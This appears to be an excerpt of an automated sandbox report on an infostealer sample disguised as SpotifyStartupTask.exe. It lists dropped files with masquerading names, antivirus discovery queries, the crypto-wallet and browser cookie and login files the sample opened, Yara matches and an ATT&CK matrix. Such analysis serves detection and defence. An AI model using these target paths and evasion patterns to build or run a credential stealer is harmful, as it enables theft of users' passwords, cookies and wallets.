                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeMemory allocated: page read and write | page guard
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qfasrhtc\qfasrhtc.cmdline"
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9F0.tmp" "c:\Windows\System32\CSC2486FE65D2A948F0A69C8E1712F1B267.TMP"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002FDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002FDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002FDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"0","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.1",5,1,"????????+??????????","user","855271","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\AppReadiness","8ZDV8O6 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeQueries volume information: C:\Users\user\Desktop\SpotifyStartupTask.exe VolumeInformation
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Windows\DiagTrack\dwm.exeQueries volume information: C:\Windows\DiagTrack\dwm.exe VolumeInformation
                              Source: C:\Windows\DiagTrack\dwm.exeQueries volume information: C:\Windows\DiagTrack\dwm.exe VolumeInformation
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeQueries volume information: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe VolumeInformation
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeQueries volume information: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe VolumeInformation
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeQueries volume information: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe VolumeInformation
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeQueries volume information: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe VolumeInformation
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeQueries volume information: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe VolumeInformation
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeQueries volume information: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe VolumeInformation
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeQueries volume information: C:\Users\user\Desktop\SpotifyStartupTask.exe VolumeInformation
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeQueries volume information: C:\Users\user\Desktop\SpotifyStartupTask.exe VolumeInformation
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeQueries volume information: C:\Program Files\7-Zip\Lang\winlogon.exe VolumeInformation
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeQueries volume information: C:\Program Files\7-Zip\Lang\winlogon.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              Source: Yara matchFile source: 0000001D.00000002.2442579545.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.2442579545.0000000003107000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.2442579545.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1269121246.0000000012CDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: SpotifyStartupTask.exe PID: 6696, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 2432, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: JNXeqwRJ1WmUZ.exe PID: 7232, type: MEMORYSTR
                              Source: Yara matchFile source: SpotifyStartupTask.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.SpotifyStartupTask.exe.600000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1180220105.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\DiagTrack\dwm.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\winlogon.exe, type: DROPPED
                              Source: Yara matchFile source: SpotifyStartupTask.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.SpotifyStartupTask.exe.600000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\DiagTrack\dwm.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\winlogon.exe, type: DROPPED
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1264186462.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aholpfdialjgjfhomihkjbmgjidlcdno:Exodus
                              Source: JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                              Source: SpotifyStartupTask.exe, 00000000.00000000.1180220105.0000000000602000.00000002.00000001.01000000.00000003.sdmp, String found in binary or memory: set_UseMachineKeyStore
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal

                              Remote Access Functionality

                              Source: Yara match, File source: 0000001D.00000002.2442579545.0000000002A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 0000001D.00000002.2442579545.0000000003107000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 0000001D.00000002.2442579545.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 0000001D.00000002.2442579545.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: 00000000.00000002.1269121246.0000000012CDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match, File source: Process Memory Space: SpotifyStartupTask.exe PID: 6696, type: MEMORYSTR
                              Source: Yara match, File source: Process Memory Space: dwm.exe PID: 2432, type: MEMORYSTR
                              Source: Yara match, File source: Process Memory Space: JNXeqwRJ1WmUZ.exe PID: 7232, type: MEMORYSTR
                              Source: Yara match, File source: SpotifyStartupTask.exe, type: SAMPLE
                              Source: Yara match, File source: 0.0.SpotifyStartupTask.exe.600000.0.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 00000000.00000000.1180220105.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match, File source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe, type: DROPPED
                              Source: Yara match, File source: C:\Windows\DiagTrack\dwm.exe, type: DROPPED
                              Source: Yara match, File source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe, type: DROPPED
                              Source: Yara match, File source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe, type: DROPPED
                              Source: Yara match, File source: C:\Program Files\7-Zip\Lang\winlogon.exe, type: DROPPED
                              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                              Gather Victim Identity Information | 1 Scripting | Valid Accounts | 241 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | 1 Taint Shared Content | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                              Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 134 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                              Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | Security Account Manager | 331 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                              Employee Names | Virtual Private Server | Local Accounts | Cron | 31 Registry Run Keys / Startup Folder | 31 Registry Run Keys / Startup Folder | 12 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 261 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 233 Masquerading | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 261 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                              [Behavior graph] Behavior Graph ID: 1639975, Sample: SpotifyStartupTask.exe, Startdate: 16/03/2025, Architecture: WINDOWS, Score: 100
